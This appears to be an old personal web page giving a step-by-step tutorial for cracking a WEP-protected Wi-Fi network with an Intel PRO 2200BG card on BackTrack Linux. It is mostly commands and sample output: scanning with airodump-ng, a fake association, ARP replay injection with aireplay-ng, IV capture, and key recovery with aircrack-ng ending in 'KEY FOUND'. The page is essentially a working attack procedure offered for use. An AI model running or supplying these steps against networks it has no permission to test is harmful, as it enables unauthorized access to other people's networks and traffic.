Site hosted by Angelfire.com: Build your free website today!

WEP CRACK WITH INTEL PRO 2200BG (also known as IPW2200)

How to crack

  1. Boot LINUX version of BACKTRACK 3 or 4 from CD
  2. Turn On Intel wireless pro 2200 bg adapter card (usualy it is)

Get thing started:
1.
airmon-ng
list shall tel you 
Interface       Chipset         Driver

 rausb0          Airlink        rt73
 eth1            Centrino       ipw2200
We are going to use eth1 device (ipw2200).

2.
airodump-ng eth1
response to this is

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:72:6B:69:0D:40   99        5        0    0  11  54  WEP  WEP         Grab
02:30:B4:65:3D:00  101        8        0    0   7  54. OPN              PLOHL

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

3.
In my example i have used the following target as practice:
BSSID = 00:72:6B:69:0D:40
Channel = 11
ESSID = Grab

determine the mac address of my INTEL PRO 2200bg adapter
type
macchanger -s eth1
response

 mac address eth1  48:5b:39:34:71:39

MY MAC = 48:5b:39:34:71:39

4.
Assocciate eth1 to channel 11 with command and create virtual rtap interface for receiving...

sudo rmmod ipw2200
sudo modprobe ipw2200 rtap_iface=1 channel=11
sudo ifconfig eth1 up
sudo ifconfig rtap0 up

5.
If there are no CLIENTS attached (listed) under topic 2, than you have no chance but to wait for a client to appear...
Cracking with ipw2200 bg (Intel pro 2200 bg or Centrino 2200 bg) card is only successfull if there are clinents attached to affected AP.

You must first create a fake connection to the AP.
Type:
iwconfig eth1 essid Grab channel 11 key s:abcde

6.
Now use the command -2 or -3 to capture and re-send capured ARP packets...
The command is:

 aireplay-ng -3 -b 00:72:6B:69:0D:40 -h 48:5b:39:34:71:39 -x 1024 -g 1000000 -i rtap0 eth1


The responce is
 Saving ARP requests in replay_arp-0219-123051.cap
 You should also start airodump-ng to capture replies.
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...



Or you can use the generated ARP request's from the ASUS card!
Using the command:
aireplay-ng -r arp-replay -i rtap0 eth1

7.
Open new terminal window and use it to capture of the IV's
Use the command:

airodump-ng -w myfile --bssid 00:72:6B:69:0D:40 --channel 11 --ivs rtap0
The response should be: 

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:72:6B:69:0D:40   99        5      123  22  11  54  WEP  WEP         Grab

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
And the number under #DATA should be increasing rapidly.

8.
Open another window and run the CRACK
Be sure to capture enough IV under #DATA section (over>50000 for 40-bit key).
Issue the command:
aircrack-ng -z myfile*.ivs
The response should be:

                                [00:00:00] Tested 29 keys (got 78617 IVs)

   KB    depth   byte(vote)
    0    0/  1   12(41472) F1(36864) 54(35840) 95(34816) 1D(34560) F0(34560) 75(34048) C1(33792)
    1    0/  1   34(40704) FB(35328) E6(34816) 23(34560) F5(34304) 1C(33792) 85(33792) 8E(33792)
    2    0/  3   56(39168) 07(37376) AC(35840) 0C(35328) DA(35328) 94(35072) 14(34816) 8D(34048)
    3    0/  1   78(40960) 42(36352) 19(35584) A0(35328) 11(34560) 17(34304) 2C(34304) 7C(34304)
    4    4/ 10   75(34304) D1(34048) 2B(33792) 60(33792) 81(33792) A9(33792) 40(33536) 73(33536)

                         KEY FOUND! [ 12:34:56:78:90 ]
        Decrypted correctly: 100%

Original post
Back to WEP Crack page
Back to main page
Email me